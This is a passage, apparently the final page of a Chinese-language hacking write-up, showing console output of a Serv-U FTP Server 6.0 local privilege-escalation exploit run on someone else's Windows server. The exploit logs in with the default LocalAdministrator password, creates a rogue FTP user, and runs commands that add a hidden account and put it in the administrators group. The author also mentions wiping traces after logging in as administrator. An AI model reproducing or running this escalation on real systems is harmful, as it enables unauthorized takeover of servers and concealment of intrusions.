下载成功.下面就直接来本地提权了.

E:\>su6 "net user wilson /add"
<220 Serv-U FTP Server v6.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:2 Created
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user wilson /add
<220 Domain deleted
******************************************************
E:\>net user
\\HX20-6C5T7P4JPA 的用户帐户
-------------------------------------------------------------
admin guest SUPPORT_388
wilson Win57-1 Win57-10
Win57-11 Win57-12 Win57-13
Win57-14 Win57-15 Win57-16
Win57-17 Win57-18 Win57-19
Win57-2 Win57-20 Win57-21
Win57-22 Win57-23 Win57-24
Win57-25 Win57-26 Win57-27
Win57-28 Win57-29 Win57-3
Win57-30 Win57-4 Win57-5
Win57-6 Win57-7 Win57-8
Win57-9
命令成功完成。

E:\>su6 "net localgroup administrators wilson /add"
<220 Serv-U FTP Server v6.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:2 Created
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net localgroup administrators wilson /add
<220 Domain deleted
******************************************************
E:\>net user wilson
用户名 wilson
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2006-4-9 19:05
密码到期 2006-5-22 17:53
密码可更改 2006-4-9 19:05
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *uuufhxsgdsetgertye645
全局组成员 *None
命令成功完成。

E:\>
登录了一下,发现没权限上终端.那肯定不是管理组.TNND管理组被管理改啥了,去看看
C:\Documents and Settings\Win57-1>net user admin
用户名 admin
全名
注释 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 No
帐户到期 从不
上次设置密码 2006-4-9 19:20
密码到期 从不
密码可更改 2006-4-9 19:20
需要密码 No
用户可以更改密码 No
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *sdgrui568u4567aetaer
全局组成员 *None
命令成功完成。
看看管理员把这个管理组设成什么bt了.sdgrui568u4567aetaer
好晕啊.后面的事就是用管理员上终端擦PP去了.写的真累.嘿嘿.
做安全的就是这样.木桶原理.一定要滴水不漏才行.任何一点小闪失都会造成全盘皆输的.不过serv-u的密码是默认的不改的确很郁闷.不过就算没拿到管理员也能实现在服务器上运行自己的程序了.朋友的要求也算是达到了.呵呵`

上一页  [1] [2] [3]